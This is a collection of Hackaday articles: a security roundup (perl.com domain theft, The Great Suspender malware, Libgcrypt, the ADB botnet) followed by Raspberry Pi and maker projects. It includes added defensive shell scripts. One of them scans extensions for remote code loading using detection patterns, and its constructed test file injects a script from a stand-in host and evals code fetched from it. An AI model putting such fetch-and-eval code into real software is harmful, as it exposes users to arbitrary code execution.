This Week In Security: Perl.com, The Great Suspender, And Google’s Solution

Perl has been stolen. Well, perl.com, at least. The perl.com domain was transferred to a different registrar on January 27, without the permission of the rightful owner. The first to notice the hack seems to have been [xtaran], who raised the alarm on a Reddit thread. The proper people quickly noticed, and started the process of getting control of the domain again. It seems that several other unrelated domains were also stolen in the same attack.

I’ve seen a couple of theories tossed around about how the domains were stolen. With multiple domains being moved, it initially seemed that the registrar had been compromised in some way. One of the other victims was told that a set of official looking documents had been supplied, “proving” that the attacker was the rightful owner of the domain. In any case, the damage is slowly being unwound. Perl.com is once again in the proper hands, evidenced by the proper SSL certificate issued back in December.

The Great Suspender, Suspended

I was greeted by a particularly nasty surprise on Thursday of this week. One of the Chrome extensions I’ve come to rely on was removed by Google for containing malware. The Great Suspender automatically hibernates unused tabs, saving ram and processor cycles that would otherwise be spent on those 150 open tabs that should really be bookmarks. What happened here?

I’ll point out that I’m extremely careful about installing extensions. It’s code written by a third party, often very difficult to inspect, and it can view and modify the sites you visit. You can manage what sites an extension has access to, but for a tool like the Suspender, it essentially needs access to all of them. The solution is to use open source extensions, right? “Well yes, but actually no.” Suspender is open source, after all. The link above goes to the project’s GitHub page. In that repo you’ll find an announcement from last year that the founding developer is finished with the project, and is selling the rights to an unknown third party, who took over maintainership. If this sounds familiar, there are echoes of the event-stream debacle.

It’s not clear exactly what malicious behavior Google found that led to the extension being pulled, but a more careful look at the project reveals that there were potential problems as early as October of 2020. An addition to the extension introduced execution of code from a remote server, never a good idea. For what it’s worth, the original maintainer has made a statement, defending the new owners, and suggesting that this was all an innocent mistake.

The lesson here? It’s not enough to confirm that an extension checks the “open source” box. Make sure there is an active community, and that there isn’t a six-month-old bug report detailing potentially malicious activity.
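To make the “code from a remote server” warning concrete, here is an added example (mine, not the column’s, and not code from The Great Suspender repository) of a first-pass shell triage for an unpacked extension: it greps the JavaScript for the usual run-time code-loading constructs and reports every hit for manual review. The pattern list and the two constructed fixture files are assumptions for the demonstration; hits are leads to read in context, not proof of malice.

```shell
#!/bin/sh
# Added example, not code from the Hackaday column or from The Great Suspender:
# a first-pass triage of an unpacked browser extension for JavaScript that
# fetches and runs code from a remote server at run time.

# scan_extension DIR -> prints file:line:text for every suspicious line.
# The pattern list is an assumption for this example; extend it as needed.
scan_extension() {
    find "$1" -name '*.js' -type f -exec grep -nHE \
        -e 'eval\(' \
        -e 'new Function\(' \
        -e 'importScripts\(' \
        -e "createElement\\(['\"]script['\"]\\)" \
        -e "\\.src *= *['\"]https?://" \
        {} +
}

# count_hits DIR -> number of suspicious lines (0 when clean)
count_hits() {
    scan_extension "$1" | wc -l | tr -d ' '
}

# make_fixture -> builds a constructed two-file extension tree, prints its path
make_fixture() {
    root=$(mktemp -d)
    mkdir -p "$root/clean" "$root/suspect"
    # Constructed benign file: all logic is local to the extension
    cat > "$root/clean/background.js" <<'EOF'
chrome.tabs.query({}, function (tabs) {
  tabs.forEach(function (tab) { suspendIfIdle(tab); });
});
EOF
    # Constructed suspicious file: injects a remote script and evals fetched text
    cat > "$root/suspect/analytics.js" <<'EOF'
var s = document.createElement('script');
s.src = 'https://tracker.example.invalid/a.js';
document.head.appendChild(s);
fetch('https://tracker.example.invalid/cfg').then(function (r) { return r.text(); })
  .then(function (code) { eval(code); });
EOF
    printf '%s\n' "$root"
}

# Stand-alone run: scan the constructed tree and summarise
d=$(make_fixture)
scan_extension "$d" || true
echo "suspicious lines: $(count_hits "$d")"
```

On a real review you would point `scan_extension` at the unpacked extension directory (or at a checkout of the repository at the commit in question) and read each hit together with the surrounding diff; a `createElement('script')` with a hard-coded `https://` source in a tab-suspender is exactly the kind of line that deserves an explanation in the commit message.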

Libgcrypt

It’s not every day you see a developer sending out a notice that everyone should stop using his latest release. That’s exactly what happened with Libgcrypt 1.9.0. Our friends over at Google’s Project Zero discovered an extremely nasty vulnerability in the code. It’s a buffer overflow that happens during the decryption process, even before signature verification. Since libgcrypt is used in many PGP implementations, the ramifications could be nasty. Receive an encrypted email, and as soon as your client decrypts it, code is executing. Thankfully, an update that fixes the issue has already been released.

Android Botnet

A new botnet is targeting Android devices in a peculiar way — looking for open ADB debug ports exposed to the Internet. Google makes it very clear that ADB over the network is insecure, and should only be used for development purposes, and on controlled networks. It’s astounding that so many vendors ship hardware with this service exposed. Beyond that, it’s surprising that so many people give their Android devices public IP addresses (or IPv6 addresses that aren’t behind a firewall). The botnet, named Matryosh, has another unique feature, as it uses Tor for command and control functions, making it harder to track.
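As an added example that is not from the column or from the Matryosh research it summarises, the following shell function checks listening-socket output for an ADB daemon on TCP 5555 (the port `adb tcpip` listens on) bound to anything other than loopback. The `ss -ltn` sample lines are constructed for the demonstration.

```shell
#!/bin/sh
# Added example, not from the Hackaday column or the Matryosh write-up.
# Detects an ADB daemon (TCP 5555, the port `adb tcpip` listens on) bound to a
# non-loopback address in `ss -ltn` style output. Run on the device itself with
#   adb shell ss -ltn | exposed_adb_listeners
# or feed it captured output from a fleet inventory.

ADB_PORT=5555

# exposed_adb_listeners: stdin = `ss -ltn` lines; prints each non-loopback
# :5555 listener as addr:port; exit 0 if at least one was found, else 1
exposed_adb_listeners() {
    awk -v port="$ADB_PORT" '
        $1 == "LISTEN" {
            la = $4                       # Local Address:Port column
            i = length(la)
            while (i > 0 && substr(la, i, 1) != ":") i--
            p = substr(la, i + 1)
            addr = substr(la, 1, i - 1)
            if (p != port) next
            # loopback-only bindings are not reachable from the network
            if (addr ~ /^127\./ || addr == "[::1]" || addr == "::1") next
            print addr ":" p
            found = 1
        }
        END { if (found) exit 0; exit 1 }
    '
}

# count_exposed TEXT -> number of exposed ADB listeners found in TEXT
count_exposed() {
    printf '%s\n' "$1" | exposed_adb_listeners | wc -l | tr -d ' '
}

# Constructed sample: one loopback-only adbd (fine), two wildcard bindings
# (reachable from the network), and an unrelated ssh listener
SAMPLE_SS_OUTPUT='State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      50     127.0.0.1:5555      0.0.0.0:*
LISTEN 0      50     0.0.0.0:5555        0.0.0.0:*
LISTEN 0      128    [::]:22             [::]:*
LISTEN 0      50     [::]:5555           [::]:*'

# Stand-alone run against the constructed sample
if printf '%s\n' "$SAMPLE_SS_OUTPUT" | exposed_adb_listeners; then
    echo "ADB is reachable from the network; return adbd to USB mode with: adb usb"
fi
```

A wildcard (`0.0.0.0`, `[::]` or `*`) binding on a device with a public address is the condition the botnet is scanning for; `adb usb` puts adbd back on USB only, and on a build where network ADB is wanted for development the fix is a firewall rule that limits 5555 to the workstation’s address.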

Google Solution to Open-Source Security

Google published a post on their open source blog, giving an overview of their new framework for the security of open source projects. “Know, Prevent, Fix” is their name for the new effort, and it must have been written by management, because it’s full of buzzwords. The most interesting elements are their goals for critical software. They identify problems like the ability of a single maintainer to push bad code into a project, and how anonymous maintainers are probably a bad idea. It will be interesting to see how these ideas develop, and how Google will help open source communities implement them.

Microsoft in My Pi

And finally, I was amused by an article lamenting the inclusion of the VSCode repository in the default Raspberry Pi OS images. He does raise a couple of legitimate points. Among them: you do send a ping to Microsoft’s servers every time you check for new updates.

The larger point is that the official VSCode binaries have telemetry code added to them — code that isn’t in the open source repository. What is it doing? You don’t know. But it probably violates European law.

Want to use VSCode, but not interested in shipping info off to Microsoft? VSCodium is a thing.

All The Best Computers From Cambridge Boot To Basic

The Raspberry Pi is a fine machine that appears in many a retrocomputing project, but its custom Linux distribution lacks one thing. It boots into a GNU/Linux shell or a fully-featured desktop GUI rather than, as proper computers should, to a BASIC interpreter. This vexed [Alan Pope], who yearned for his early days of ROM BASIC, so he set out to create a Raspberry Pi 400 that delivers the user straight to BASIC. What follows goes well beyond the Pi, as he takes something of a “State of the BASIC” look at the various available interpreters for the simple-to-code language. Almost every major flavour you could imagine has an interpreter, but as is appropriate for a computer from Cambridge running an ARM processor, he opts for one that delivers BBC BASIC.

It would certainly be possible to write a bare-metal image that took the user straight to a native ARM BASIC interpreter, but instead he opts for the safer route of running the interpreter on top of a minimalist Linux image. Here he takes the unexpected step of using an Ubuntu distribution rather than Raspberry Pi OS, a choice made through familiarity with its quirks. Eventually he settled upon a BBC BASIC interpreter that allowed him to do all the graphical tricks via the SDL library without a hint of X or a compositor, meaning that at last he had a Pi that boots to BASIC. Assuming that it’s an interpreter rather than an emulator, it should be significantly faster than the original, but he doesn’t share that information with us.

This isn’t the first boot-to-BASIC machine we’ve shown you.

Header image:  A real BBC Micro BASIC prompt. Thanks [Claire Osborne] for the picture.

Repairing 200+ Raspberry Pis For A Good Cause

If somebody told you they recently purchased over 200 Raspberry Pis, you might think they were working on some kind of large-scale clustering project. But in this case, [James Dawson] purchased the collection of broken single-board computers with the intention of repairing them so they could be sent to developing countries for use in schools. It sounds like the logistics of that are proving to be a bit tricky, but we’re happy to report he’s at least made good progress on getting the Pis back up and running.

He secured this trove of what he believes to be customer-returned Raspberries for the princely sum of £61 ($83 USD). At that price, even if only a fraction ended up being repairable, you’d still come out ahead. Granted, all of these appear to be the original Model B, but that’s still a phenomenal deal in our book. Assuming, of course, you can find some reasonable way to triage them to sort out what’s worth keeping.

To that end, [James] came up with a Bash script that allowed him to check several hardware components including the USB, Ethernet, I2C, and GPIO. With the script on an SD card and a 3.5″ TFT plugged into the Pi’s header for output, he was able to quickly go through the box to get an idea of what sort of trouble he’d gotten himself into. He was only about halfway through the process when he wrote this particular blog post, but by that point, he’d found just 40 Pis which wouldn’t start at all. He suspects these might be victims of some common issue in the power circuitry that he’ll investigate at a later date.
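An added example of what such a triage script can look like; it is not [James]’s script. Each check takes a root directory, so the same functions run against the real `/sys` on a Pi or against the constructed sysfs-style tree built below. The `eth0` interface name, the `i2c-1` bus number and the sysfs GPIO value files are assumptions for an original Model B.

```shell
#!/bin/sh
# Added example, not [James Dawson]'s script: a sysfs-based Pi triage in the
# same spirit. ROOT is "/" on a real board or a constructed tree for testing.

# usb_device_count ROOT -> number of attached USB devices (hubs and interface
# entries such as 1-0:1.0 are not counted)
usb_device_count() {
    n=0
    for d in "$1"/sys/bus/usb/devices/*; do
        [ -e "$d" ] || continue
        case $(basename "$d") in
            *:*) ;;                        # interface descriptor, not a device
            [0-9]-[0-9]*) n=$((n + 1)) ;;  # bus-port, e.g. 1-1 or 1-1.3
        esac
    done
    echo "$n"
}

# eth_link_up ROOT -> 0 if eth0 reports a carrier (cable plugged, PHY alive)
eth_link_up() {
    [ "$(cat "$1/sys/class/net/eth0/carrier" 2>/dev/null)" = "1" ]
}

# i2c_bus_present ROOT -> 0 if the i2c-1 bus is registered
# (on hardware, follow up with `i2cdetect -y 1` to probe the bus)
i2c_bus_present() {
    [ -d "$1/sys/bus/i2c/devices/i2c-1" ]
}

# gpio_loopback OUT_VALUE IN_VALUE -> 0 if levels written to the output pin's
# sysfs value file are read back on a jumpered input pin
gpio_loopback() {
    for level in 1 0 1; do
        echo "$level" > "$1"
        [ "$(cat "$2")" = "$level" ] || return 1
    done
    return 0
}

# triage ROOT OUT_VALUE IN_VALUE -> one summary line; returns 1 if anything failed
triage() {
    usb=$(usb_device_count "$1")
    eth=fail;  eth_link_up "$1" && eth=ok
    i2c=fail;  i2c_bus_present "$1" && i2c=ok
    gpio=fail; gpio_loopback "$2" "$3" && gpio=ok
    echo "usb_devices=$usb eth=$eth i2c=$i2c gpio=$gpio"
    [ "$eth" = ok ] && [ "$i2c" = ok ] && [ "$gpio" = ok ] && [ "$usb" -gt 0 ]
}

# make_pi_fixture -> constructed tree resembling a board with dead Ethernet
make_pi_fixture() {
    root=$(mktemp -d)
    mkdir -p "$root/sys/bus/usb/devices/usb1" \
             "$root/sys/bus/usb/devices/1-0:1.0" \
             "$root/sys/bus/usb/devices/1-1" \
             "$root/sys/bus/usb/devices/1-1:1.0" \
             "$root/sys/bus/usb/devices/1-1.3" \
             "$root/sys/class/net/eth0" \
             "$root/sys/bus/i2c/devices/i2c-1"
    echo 0 > "$root/sys/class/net/eth0/carrier"   # no carrier: dead Ethernet
    echo 0 > "$root/gpio_out"
    ln -s "$root/gpio_out" "$root/gpio_in"        # jumper: input reads the output back
    echo 0 > "$root/gpio_dead"                    # broken trace: pin always reads 0
    echo "$root"
}

# Stand-alone run against the constructed tree. On a real board, export two
# jumpered pins via sysfs and pass their value files instead.
fx=$(make_pi_fixture)
triage "$fx" "$fx/gpio_out" "$fx/gpio_in" || echo "board needs repair"
```

The summary line is what you would push to the little TFT; a board that prints `eth=fail` with everything else `ok` lands in the “dead Ethernet” pile, and one where `gpio_loopback` fails on a given pin pair points at the bent-pin problem he describes.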

The majority of Pis he checked were suffering from nothing worse than some bent GPIO pins or broken SD card slots. Some of the more abused examples had their USB ports ripped off entirely, but were otherwise fine. Another 10 had dead Ethernet, and 4 appear to have damaged traces leading to their HDMI ports. While we’re interested in hearing if [James] can get those 40 dark Pis to fire back up, so far the results are quite promising.

Donating hardware is always a tricky thing, so for now [James] says he’ll be selling the repaired Pis on eBay and donating the proceeds to the Raspberry Pi Foundation so they can continue to develop hardware that will (potentially) accomplish their goal of giving students all over the world a functional computer.

New Parts, New Hacks

The biggest news this week is that Raspberry Pi is no longer synonymous with single-board Linux computers: they’re dipping their toes into the microcontroller business with their first chip: the RP2040, and the supporting breakout board, the Pico. It’s an affordable, capable microcontroller being made by a firm that’s never made microcontrollers before, so that’s newsy.

The Hackaday comments lit on fire about this chip, with some fraction of the commenters lamenting the lack of wireless radios onboard. It’s a glass-half-full thing, I guess, but the RP2040 isn’t an ESP32, folks. It’s something else. And it’s got a hardware trick up its sleeve that really tickles my fancy — the programmable input/output (PIO) units.

The other half of the commenters were, like me, salivating about getting to try out some of the new features. The PIO, of course, was high on that list, but this chip also caters to folks who are doing high-speed DSP, with fast multiplication routines burnt into ROM and a nice accumulator. (You know you’re a microcontroller nerd when you’re reading through a 663-page datasheet and thinking about all the funny ways you can use and/or abuse the hardware peripherals.)

All chip designs are compromises. Nothing can do everything. The new peripherals, novel combinations of old elements, and just pleasant design decisions, open up new opportunities if you’re willing to seek them out. When the ESP32 was new, I was looking at their oddball parallel-I2S hardware and thinking what kind of crazy hacks that would enable, and clever hackers have proven me right. I’d put my money on the PIO being similar.

New chips open up new possibilities for hacks. What are you going to do with them?

Raspberry Pi Enters Microcontroller Game With $4 Pico

Raspberry Pi was synonymous with single-board Linux computers. No longer. The $4 Raspberry Pi Pico board is their attempt to break into the crowded microcontroller module market.

The microcontroller in question, the RP2040, is also Raspberry Pi’s first foray into custom silicon, and it’s got a dual-core Cortex M0+ with luxurious amounts of SRAM and some very interesting custom I/O peripheral hardware that will likely mean that you never have to bit-bang again. But a bare microcontroller is no fun without a dev board, and the Raspberry Pi Pico adds 2 MB of flash, USB connectivity, and nice power management.

As with the Raspberry Pi Linux machines, the emphasis is on getting you up and running quickly, and there is copious documentation: from “Getting Started” type guides for both the C/C++ and MicroPython SDKs with code examples, to serious datasheets for the Pico and the RP2040 itself, to hardware design notes and KiCAD breakout boards, and even the contents of the on-board Boot ROM. The Pico seems designed to make a friendly introduction to microcontrollers using MicroPython, but there’s enough guidance available for you to go as deep down the rabbit hole as you’d like.

Our quick take: the RP2040 is a very well thought-out microcontroller, with myriad nice design touches throughout, enough power to get most jobs done, and an innovative and very hacker-friendly software-defined hardware I/O peripheral. It’s backed by good documentation and many working examples, and at the end of the day it runs a pair of familiar ARM M0+ CPU cores. If this hits the shelves at the proposed $4 price, we can see it becoming the go-to board for many projects that don’t require wireless connectivity.

But you want more detail, right? Read on.

Solid Oak Arcade Cabinet: When Particle Board Won’t Do

Having an arcade cabinet of one’s own is a common dream among those who grew up during the video game arcade heyday of the 80s and early 90s. It’s a fairly common project that doesn’t take too much specialized knowledge to build. This cabinet, on the other hand, pulled out all of the stops for the cabinet itself, demonstrating an impressive level of woodworking expertise.

The cabinet enclosure is made with red oak boards, which the creator [Obstreperuss] sawed and planed and then glued together to create the various panels (more details are available on his Imgur album). The Mario artwork on the sides and front isn’t just vinyl stickers, either. He used various hardwoods cut into small squares to create pixel art inlays in the oak faces. After the fancy woodwork was completed, the build was finished out with some USB arcade controllers, a flat-panel screen, and a Raspberry Pi to run the games.

While the internals are pretty standard, we have to commend the incredible quality of the woodworking. It’s an impressive homage to classic arcade machines and we wouldn’t mind a similar one in our own homes. If you’re lacking the woodworking equipment, though, it’s possible to get a refined (yet smaller) arcade cabinet for yourself with a 3D printer instead.

A Tubular Fairy Tale You Control With Your Phone

At first glance, this might appear to be a Rube Goldberg machine made of toys. The truth isn’t far off — it’s a remote-control animatronic story machine driven by its spectators and their phones. [Niklas Roy] and a team of volunteers built it in just two weeks for Phaenomenale, a festival centered around art and digital culture that takes place every other year.

A view of the tubes without the toys.

A red ball travels through a network of clear acrylic tubes using 3D printed Venturi air movers, gravity, and toys to help it travel. Spectators can change the ball’s path with their phones via a local website with a big picture of the installation. The ball triggers animations along its path using break beam detection and weaves a different story each time depending on the toys it interacts with.

Here’s how it works: a Raspberry Pi 4 is responsible for releasing the ball at the beginning of the track and for controlling the track switches. The Pi also hosts a server for smartphones and the 25 Arduino Nanos that control the LEDs and servos of the animatronics. As a bonus animatronic, there’s a giant whiteboard that rotates and switches between displaying the kids’ drawings and the team’s plans and schematics. Take a brief but up-close tour after the break.

This awesome art project was a huge collaborative effort that involved the people of Wolfsburg, Germany — families in the community donated their used and abandoned toys, groups of elementary school kids were brought in to create stories for the toys, and several high school kids and other collaborators realized these drawings with animatronics.

Toys can teach valuable lessons, too. Take this body-positive sushi-snarfing Barbie for example, or this dollhouse of horrors designed to burn fire safety into children’s brains.
